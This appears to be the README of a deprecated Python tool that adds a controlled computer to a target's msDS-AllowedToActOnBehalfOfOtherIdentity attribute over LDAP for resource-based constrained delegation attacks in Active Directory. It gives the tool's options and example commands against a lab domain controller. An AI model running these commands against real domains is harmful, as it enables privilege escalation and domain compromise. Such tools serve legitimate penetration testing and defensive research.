Awesome
Depricated in favor of Impacket implementation
https://github.com/SecureAuthCorp/impacket/pull/1108
rbcd_permissions
Add SD for controlled computer object to a target object for resource-base constrained delegation (RBCD) using LDAP
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
username for LDAP
-p PASSWORD, --password PASSWORD
password for LDAP
-H HASH, --hash HASH LM:NT hash for LDAP
-k, --kerberos Kerberos Auth GSSAPI
-d DOMAIN, --domain DOMAIN
LDAP server/domain
-t TARGETDN, --targetDn TARGETDN
Target distinguishedName (Example: "CN=DC1,OU=Domain Controllers,DC=lab,DC=local")
-c CONTRDN, --contrDn CONTRDN
Controlled computer distingushedName to add to msDS-AllowedToActOnBehalfOfOtherIdentity attribute
-l LDAPSERVER, --ldapserver LDAPSERVER
LDAP server, in case it cant resolve
--cleanup Delete msDS-AllowedToActOnBehalfOfOtherIdentity value
Supports NTLM hash, kerberos and password auth.
Password
python3 rbcd.py -t 'CN=DC1,OU=Domain Controllers,DC=lab,DC=local' -d lab.local -c CN=Server1,CN=Computers,DC=lab,DC=local -u administrator -p Password1 -l dc1.lab.local
Successfully added permissions!
Kerberos
python3 rbcd.py -t 'CN=DC1,OU=Domain Controllers,DC=lab,DC=local' -d lab.local -c CN=Server1,CN=Computers,DC=lab,DC=local -k -l dc1.lab.local
Successfully added permissions!
Cleanup
python3 rbcd.py -t 'CN=DC1,OU=Domain Controllers,DC=lab,DC=local' -d lab.local -c CN=Server1,CN=Computers,DC=lab,DC=local -u administrator -p Password1 -l dc1.lab.local --cleanup
Successfully cleaned up!